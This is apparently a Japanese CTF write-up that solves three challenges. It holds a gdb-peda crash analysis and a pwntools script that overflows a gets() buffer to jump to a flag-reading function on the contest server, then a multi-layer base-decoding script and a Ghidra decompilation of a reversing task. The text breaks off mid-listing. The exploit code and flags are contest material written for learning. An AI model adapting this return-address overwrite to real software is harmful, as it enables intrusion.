0016| 0x7fffffffde38 --> 0x7fffffffdf08 --> 0x7fffffffe242 ("/mnt/hgfs/Shared/ret2generic-flag-reader")
0024| 0x7fffffffde40 --> 0x100008000 
0032| 0x7fffffffde48 --> 0x4013a5 (<main>:	endbr64)
0040| 0x7fffffffde50 --> 0x0 
0048| 0x7fffffffde58 --> 0x48185c2f2775a721 
0056| 0x7fffffffde60 --> 0x401110 (<_start>:	endbr64)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Temporary breakpoint 1, 0x00000000004013a5 in main ()
gdb-peda$ pattc 100
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL'
gdb-peda$ c
Continuing.
alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...
how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!
slap on some flavortext and there's no way rob will fire me now!
this is genius!! what do you think?
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x0 
RCX: 0x7ffff7dcda00 --> 0xfbad208b 
RDX: 0x7ffff7dcf8d0 --> 0x0 
RSI: 0x7ffff7dcda83 --> 0xdcf8d0000000000a 
RDI: 0x0 
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffde28 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
RIP: 0x40142f (<main+138>:	ret)
R8 : 0x7ffff7dcf8c0 --> 0x0 
R9 : 0x7ffff7fd84c0 (0x00007ffff7fd84c0)
R10: 0x3 
R11: 0x246 
R12: 0x401110 (<_start>:	endbr64)
R13: 0x7fffffffdf00 --> 0x1 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x401424 <main+127>:	call   0x4010e0 <gets@plt>
   0x401429 <main+132>:	mov    eax,0x0
   0x40142e <main+137>:	leave  
=> 0x40142f <main+138>:	ret    
   0x401430 <__libc_csu_init>:	endbr64 
   0x401434 <__libc_csu_init+4>:	push   r15
   0x401436 <__libc_csu_init+6>:	
    lea    r15,[rip+0x29d3]        # 0x403e10
   0x40143d <__libc_csu_init+13>:	push   r14
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffde28 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffde30 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffde38 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffde40 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffde48 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffde50 ("AJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffde58 ("AAKAAgAA6AAL")
0056| 0x7fffffffde60 --> 0x4c414136 ('6AAL')
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040142f in main ()
gdb-peda$ patto AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL
AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL found at offset: 40

40バイトのあと、super_generic_flag_reading_function_please_ret_to_me関数のアドレス(0x4011f6)をセットすればよい。

from pwn import *

if len(sys.argv) == 1:
    p = remote('mc.ax', 31077)
else:
    p = process('./ret2generic-flag-reader')

payload = 'A' * 40
payload += p64(0x4011f6)

data = p.recvline().rstrip()
print data
data = p.recvline().rstrip()
print data
data = p.recvline().rstrip()
print data
data = p.recvline().rstrip()
print data
print payload
p.sendline(payload)
data = p.recvline().rstrip()
print data

実行結果は以下の通り。

[+] Opening connection to mc.ax on port 31077: Done
alright, the rob inc company meeting is tomorrow and i have to come up with a new pwnable...
how about this, we'll make a generic pwnable with an overflow and they've got to ret to some flag reading function!
slap on some flavortext and there's no way rob will fire me now!
this is genius!! what do you think?
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�@\x00\x00
flag{rob-loved-the-challenge-but-im-still-paid-minimum-wage}
[*] Closed connection to mc.ax port 31077
flag{rob-loved-the-challenge-but-im-still-paid-minimum-wage}

round-the-bases (crypto)

次々と以下の順でデコードする。

・base85
・base64
・base16
・ASCII
・ASCII
・2進数デコード
#!/usr/bin/python3
from base64 import *

with open('round-the-bases', 'r') as f:
    data = f.read()

data = a85decode(data)
print('[+] 1:', data)
data = b64decode(data)
print('[+] 2:', data)
data = b16decode(data)
print('[+] 3:', data)
codes = map(int, data.split(b' '))
data = ''.join([chr(code) for code in codes]).encode()
print('[+] 4:', data)
codes = map(int, data.split(b' '))
data = ''.join([chr(code) for code in codes]).encode()
print('[+] 5:', data)
bin_code = data.replace(b'<', b'0').replace(b'=', b'1')
data = ''.join([chr(int(bin_code[i:i+8], 2)) for i in range(0, len(bin_code), 8)]).encode()
print('[*] flag:', data)

実行結果は以下の通り。

[+] 1: b'MzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzOTIwMzMzMjIwMzUzNDIwMzQzODIwMzMzMjIwMzUzNDIwMzQzOQ=='
[+] 2: b'3534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203438203332203534203438203332203534203439203332203534203438203332203534203438203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439203332203534203438203332203534203439203332203534203438203332203534203439203332203534203439203332203534203439203332203534203438203332203534203438203332203534203438203332203534203438203332203534203438203332203534203439203332203534203439203332203534203439203332203534203439203332203534203439203332203534203438203332203534203439'
[+] 3: b'54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 48 32 54 48 32 54 49 32 54 48 32 54 48 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49 32 54 48 32 54 49 32 54 48 32 54 49 32 54 49 32 54 49 32 54 48 32 54 48 32 54 48 32 54 48 32 54 48 32 54 49 32 54 49 32 54 49 32 54 49 32 54 49 32 54 48 32 54 49'
[+] 4: b'60 61 61 60 60 61 61 60 60 61 61 60 61 61 60 60 60 61 61 60 60 60 60 61 60 61 61 60 60 61 61 61 60 61 61 61 61 60 61 61 60 61 61 61 60 61 61 61 60 60 61 61 60 60 60 60 60 61 61 61 60 61 61 61 60 61 60 61 61 61 61 61 60 61 61 61 60 61 60 60 60 61 61 60 61 60 60 60 60 60 61 61 60 61 60 60 60 61 61 61 60 61 60 60 60 61 60 61 61 61 61 61 60 61 61 61 60 61 61 61 60 60 61 61 60 61 60 60 60 61 61 61 60 60 61 61 60 61 60 61 61 61 61 61 60 60 61 61 60 61 60 60 60 61 61 60 61 61 60 60 60 61 61 60 61 61 60 60 60 61 60 61 61 61 61 61 60 61 61 61 60 61 61 61 60 61 61 61 60 60 61 60 60 60 61 61 60 61 60 60 60 61 61 61 60 60 60 60 60 61 61 61 60 60 60 60 60 60 61 61 60 60 61 61 60 61 61 60 60 61 60 60 60 61 60 61 61 61 61 61 60 61 61 61 60 61 60 61 60 61 61 61 60 60 60 60 60 61 61 61 61 61 60 61'
[+] 5: b'<==<<==<<==<==<<<==<<<<=<==<<===<====<==<===<===<<==<<<<<===<===<=<=====<===<=<<<==<=<<<<<==<=<<<===<=<<<=<=====<===<===<<==<=<<<===<<==<=<=====<<==<=<<<==<==<<<==<==<<<=<=====<===<===<===<<=<<<==<=<<<===<<<<<===<<<<<<==<<==<==<<=<<<=<=====<===<=<=<===<<<<<=====<='
[*] flag: b'flag{w0w_th4t_w4s_4ll_wr4pp3d_up}'
flag{w0w_th4t_w4s_4ll_wr4pp3d_up}

bread-making (rev)

Ghidraでデコンパイルする。

undefined8 FUN_00102180(void)

{
  undefined *puVar1;
  long lVar2;
  int iVar3;
  char *pcVar4;
  size_t sVar5;
  long lVar6;
  long in_FS_OFFSET;
  char acStack200 [136];
  long local_40;
  
  local_40 = *(long *)(in_FS_OFFSET + 0x28);
  setbuf(stdin,(char *)0x0);
  setbuf(stdout,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  signal(0xe,FUN_001024d0);
  DAT_00106440 = 0;
  do {
    alarm(*(uint *)(&PTR_DAT_00106020)[DAT_00106440]);
    puts(*(char **)((&PTR_DAT_00106020)[DAT_00106440] + 8));
    do {
      pcVar4 = fgets(acStack200,0x80,stdin);
      if (pcVar4 == (char *)0x0) {
LAB_00102330:
        FUN_001024a0();
        goto LAB_00102337;
      }
      sVar5 = strcspn(acStack200,"\n");
      acStack200[sVar5] = '\0';
      puVar1 = (&PTR_DAT_00106020)[DAT_00106440];
      lVar2 = *(long *)(puVar1 + 0x18);
      if (lVar2 == 0) goto LAB_00102330;
      lVar6 = 0;
      while( true ) {
        iVar3 = strcmp(acStack200,*(char **)(puVar1 + lVar6 * 0x10 + 0x20));
        if (iVar3 == 0) break;
        lVar6 = lVar6 + 1;
        if (lVar2 == lVar6) goto LAB_00102330;
      }
      iVar3 = (**(code **)(puVar1 + lVar6 * 0x10 + 0x28))();
      if (iVar3 == -1) goto LAB_00102330;
    } while (iVar3 != 0);
    DAT_00106440 = DAT_00106440 + 1;
    puts("");
  } while (DAT_00106440 < 0xb);
  alarm(0);
  puts("it\'s the next morning");
  if (_DAT_0010641c == 0) {
    puts("mom finds flour in the sink and accuses you of making bread");
  }
  else {
    if (_DAT_00106418 == 0) {
LAB_00102337:
      puts("mom finds flour on the counter and accuses you of making bread");
    }
    else {
      if (_DAT_00106414 == 0) {
        puts("mom finds burnt bread on the counter and accuses you of making bread");
      }
      else {
        if (_DAT_00106410 == 0) {
          puts("mom finds the window opened and accuses you of making bread");
        }
        else {
          if (_DAT_0010640c == 0) {
            puts("mom finds the fire alarm in the laundry room and accuses you of making bread");
          }
          else {
            FUN_001025c0();
          }
        }
      }
    }
  }
  if (local_40 == *(long *)(in_FS_OFFSET + 0x28)) {
    return 0;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

void FUN_001025c0(void)

{
  FILE *__stream;
  char *pcVar1;
  long in_FS_OFFSET;
  char acStack152 [136];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  puts("mom doesn\'t suspect a thing, but asks about some white dots on the bathroom floor");
  __stream = fopen("flag.txt","r");
  if (__stream != (FILE *)0x0) {
    pcVar1 = fgets(acStack152,0x80,__stream);
    if (pcVar1 != (char *)0x0) {
      puts(acStack152);
      goto LAB_00102634;
    }
  }
  puts("couldn\'t open/read flag file, contact an admin if running on server");
LAB_00102634:
  if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
    return;
  }
                    /* WARNING: Subroutine does not return */
  __stack_chk_fail();
}

                             s_add_ingredients_to_the_bowl_00103b3c          XREF[2]:     FUN_00102180:00102220(*), 
                                                                                          00106348(*)  
        00103b3c 61 64 64        ds         "add ingredients to the bowl"
                 20 69 6e 
                 67 72 65 
                             s_add_flour_00103b58                            XREF[3]:     FUN_00102180:00102297(*), 
                                                                                          FUN_00102180:00102332(*), 
                                                                                          00106360(*)  
        00103b58 61 64 64        ds         "add flour"
                 20 66 6c 
                 6f 75 72 00
                             s_add_yeast_00103b62                            XREF[2]:     FUN_00102180:00102297(*), 
                                                                                          00106370(*)  
        00103b62 61 64 64        ds         "add yeast"
                 20 79 65 
                 61 73 74 00
                             s_add_salt_00103b6c                             XREF[1]:     00106380(*)  
        00103b6c 61 64 64        ds         "add salt"
                 20 73 61 
                 6c 74 00
                             s_add_water_00103b75                            XREF[1]:     00106390(*)  
        00103b75 61 64 64        ds         "add water"
                 20 77 61 
